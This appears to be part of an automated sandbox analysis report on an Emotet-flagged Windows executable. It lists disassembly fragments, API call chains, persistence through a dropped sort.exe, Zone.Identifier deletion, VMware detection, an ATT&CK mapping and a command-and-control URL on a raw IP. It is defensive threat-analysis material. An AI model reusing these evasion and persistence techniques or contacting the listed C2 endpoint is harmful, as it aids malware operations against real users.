Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D90 push ecx; mov dword ptr [esp], 0000B2E0h	0_2_02235D91
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235DF0 push ecx; mov dword ptr [esp], 0000AAF5h	0_2_02235DF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235DC0 push ecx; mov dword ptr [esp], 000089FAh	0_2_02235DC1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406520 push eax; ret	0_2_0040653E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406830 push eax; ret	0_2_0040685E
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235E10 push ecx; mov dword ptr [esp], 0000F5B3h	0_2_02235E11
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235EA0 push ecx; mov dword ptr [esp], 0000A3FDh	0_2_02235EA1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235EF0 push ecx; mov dword ptr [esp], 0000669Ch	0_2_02235EF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235F20 push ecx; mov dword ptr [esp], 0000E36Ch	0_2_02235F21
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235CD0 push ecx; mov dword ptr [esp], 00001CE1h	0_2_02235CD1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D20 push ecx; mov dword ptr [esp], 0000C5A1h	0_2_02235D21
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D00 push ecx; mov dword ptr [esp], 00001F9Eh	0_2_02235D01
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D50 push ecx; mov dword ptr [esp], 00006847h	0_2_02235D51
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235D90 push ecx; mov dword ptr [esp], 0000B2E0h	0_2_02235D91
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235DF0 push ecx; mov dword ptr [esp], 0000AAF5h	0_2_02235DF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02235DC0 push ecx; mov dword ptr [esp], 000089FAh	0_2_02235DC1
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00406520 push eax; ret	1_2_0040653E
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00406830 push eax; ret	1_2_0040685E
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275E10 push ecx; mov dword ptr [esp], 0000F5B3h	1_2_02275E11
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275EA0 push ecx; mov dword ptr [esp], 0000A3FDh	1_2_02275EA1
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275EF0 push ecx; mov dword ptr [esp], 0000669Ch	1_2_02275EF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275F20 push ecx; mov dword ptr [esp], 0000E36Ch	1_2_02275F21
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275CD0 push ecx; mov dword ptr [esp], 00001CE1h	1_2_02275CD1
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275D20 push ecx; mov dword ptr [esp], 0000C5A1h	1_2_02275D21
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275D00 push ecx; mov dword ptr [esp], 00001F9Eh	1_2_02275D01
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275D50 push ecx; mov dword ptr [esp], 00006847h	1_2_02275D51
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275D90 push ecx; mov dword ptr [esp], 0000B2E0h	1_2_02275D91
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275DF0 push ecx; mov dword ptr [esp], 0000AAF5h	1_2_02275DF1
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02275DC0 push ecx; mov dword ptr [esp], 000089FAh	1_2_02275DC1
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0223EA26 push ebp; iretd	1_2_0223EA28
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02227A3E push ecx; mov dword ptr [esp], 0000A3FDh	1_2_02227A3F
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02227ABE push ecx; mov dword ptr [esp], 0000E36Ch	1_2_02227ABF
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0223EA8B push edi; ret	1_2_0223EAC3
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02227A8E push ecx; mov dword ptr [esp], 0000669Ch	1_2_02227A8F

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Executable created and started: C:\Windows\SysWOW64\setupugc\sort.exe			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Executable created and started: C:\Windows\SysWOW64\setupugc\sort.exe			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	PE file moved: C:\Windows\SysWOW64\setupugc\sort.exe			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	PE file moved: C:\Windows\SysWOW64\setupugc\sort.exe			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\Desktop\2ojdmC51As.exe	File opened: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	File opened: C:\Windows\SysWOW64\setupugc\sort.exe:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0042252B IsWindowVisible,IsIconic,	0_2_0042252B
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic,	0_2_004198B0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00404F00
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_0042252B IsWindowVisible,IsIconic,	0_2_0042252B
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004198B0 GetParent,GetParent,GetParent,IsIconic,	0_2_004198B0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00404F00
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0042252B IsWindowVisible,IsIconic,	1_2_0042252B
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_004198B0 GetParent,GetParent,GetParent,IsIconic,	1_2_004198B0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00404F00 IsIconic,GetWindowPlacement,GetWindowRect,	1_2_00404F00

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Show sources

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-25851
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Evasive API call chain: GetPEB, DecisionNodes, ExitProcess			graph_0-25851

Source: C:\Users\user\Desktop\2ojdmC51As.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,		0_2_02235070
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: EnumServicesStatusExW,GetTickCount,ChangeServiceConfig2W,OpenServiceW,OpenServiceW,QueryServiceConfig2W,CloseServiceHandle,GetProcessHeap,		0_2_02235070

Source: C:\Users\user\Desktop\2ojdmC51As.exe	API coverage: 3.2 %
Source: C:\Windows\SysWOW64\setupugc\sort.exe	API coverage: 4.8 %
Source: C:\Users\user\Desktop\2ojdmC51As.exe	API coverage: 3.2 %
Source: C:\Windows\SysWOW64\setupugc\sort.exe	API coverage: 4.8 %

Source: C:\Windows\System32\svchost.exe TID: 5820	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5820	Thread sleep time: -150000s >= -30000s			Jump to behavior

Source: all processes	Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes	Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\2ojdmC51As.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\2ojdmC51As.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004182CC FindFirstFileA,FindClose,	0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,	0_2_022338F0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004182CC FindFirstFileA,FindClose,	0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose,	0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_004182CC FindFirstFileA,FindClose,	1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,	1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose,	1_2_022738F0

Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sort.exe, 00000001.00000002.932241533.0000000002A70000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: sort.exe, 00000001.00000002.932241533.0000000002A70000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.770339069.00000278736D9000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000003.00000002.727188639.0000024903260000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.740471778.0000024E18060000.00000002.00000001.sdmp, svchost.exe, 00000006.00000002.771007712.0000027874600000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\setupugc\sort.exe	API call chain: ExitProcess graph end node			graph_1-33161
Source: C:\Windows\SysWOW64\setupugc\sort.exe	API call chain: ExitProcess graph end node			graph_1-33161

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information queried: ProcessInformation			Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Process information queried: ProcessInformation			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,		0_2_004013A4
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,		0_2_004013A4

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,		0_2_004013A4
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_004013A4 LoadLibraryA,GetProcAddress,CreateDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,LdrFindResource_U,LdrAccessResource,CreateDirectoryA,VirtualAlloc,		0_2_004013A4

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02234E20 mov eax, dword ptr fs:[00000030h]	0_2_02234E20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233F20 mov eax, dword ptr fs:[00000030h]	0_2_02233F20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02234E20 mov eax, dword ptr fs:[00000030h]	0_2_02234E20
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_02233F20 mov eax, dword ptr fs:[00000030h]	0_2_02233F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02274E20 mov eax, dword ptr fs:[00000030h]	1_2_02274E20
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02273F20 mov eax, dword ptr fs:[00000030h]	1_2_02273F20
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02225ABE mov eax, dword ptr fs:[00000030h]	1_2_02225ABE
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_0222095E mov eax, dword ptr fs:[00000030h]	1_2_0222095E
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_022269BE mov eax, dword ptr fs:[00000030h]	1_2_022269BE
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02220456 mov eax, dword ptr fs:[00000030h]	1_2_02220456
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_02241030 mov eax, dword ptr fs:[00000030h]	1_2_02241030

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_022342F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,		0_2_022342F0
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_022342F0 GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,		0_2_022342F0

Source: all processes	Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: all processes	Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00409C36 SetUnhandledExceptionFilter,	0_2_00409C36
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00409C48 SetUnhandledExceptionFilter,	0_2_00409C48
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00409C36 SetUnhandledExceptionFilter,	0_2_00409C36
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00409C48 SetUnhandledExceptionFilter,	0_2_00409C48
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00409C36 SetUnhandledExceptionFilter,	1_2_00409C36
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Code function: 1_2_00409C48 SetUnhandledExceptionFilter,	1_2_00409C48

Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: sort.exe, 00000001.00000002.931565521.0000000000C60000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation,		0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation,		0_2_00406204

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation,		0_2_00406204
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00406204 GetLocalTime,GetSystemTime,GetTimeZoneInformation,		0_2_00406204

Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00425FF1 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,		0_2_00425FF1
Source: C:\Users\user\Desktop\2ojdmC51As.exe	Code function: 0_2_00425FF1 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,		0_2_00425FF1

Source: C:\Windows\SysWOW64\setupugc\sort.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid			Jump to behavior
Source: C:\Windows\SysWOW64\setupugc\sort.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid			Jump to behavior

Stealing of Sensitive Information:

Yara detected Emotet

Show sources

Source: Yara match	File source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.2ojdmC51As.exe.2230000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.sort.exe.2270000.1.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Service Execution1	Windows Service2	Windows Service2	Masquerading12	Input Capture2	System Time Discovery2	Remote Services	Input Capture2	Exfiltration Over Other Network Medium	Encrypted Channel22	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API11	Boot or Logon Initialization Scripts	Process Injection2	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery21	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Deobfuscate/Decode Files or Information1	NTDS	Process Discovery3	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Hidden Files and Directories1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information2	Cached Domain Credentials	System Service Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	File Deletion1	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery16	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
2ojdmC51As.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.2ojdmC51As.exe.2230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File
1.2.sort.exe.2270000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm	0%	Avira URL Cloud	safe
https://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/	0%	Avira URL Cloud	safe
https://watson.telemet:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.hulu.com/privacy	svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	false		high
http://200.116.145.225:443/0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm	sort.exe, 00000001.00000002.932263156.0000000002AA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 00000006.00000003.753653199.0000027873F79000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp	false		high
https://www.hulu.com/do-not-sell-my-info	svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	false		high
http://www.hulu.com/terms	svchost.exe, 00000006.00000003.752710199.0000027873F8F000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	false		high
https://www.roblox.com/develop	svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp, svchost.exe, 00000006.00000003.758104226.0000027873F6B000.00000004.00000001.sdmp	false		high
http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1	svchost.exe, 00000006.00000003.758203492.0000027873F2A000.00000004.00000001.sdmp	false		high
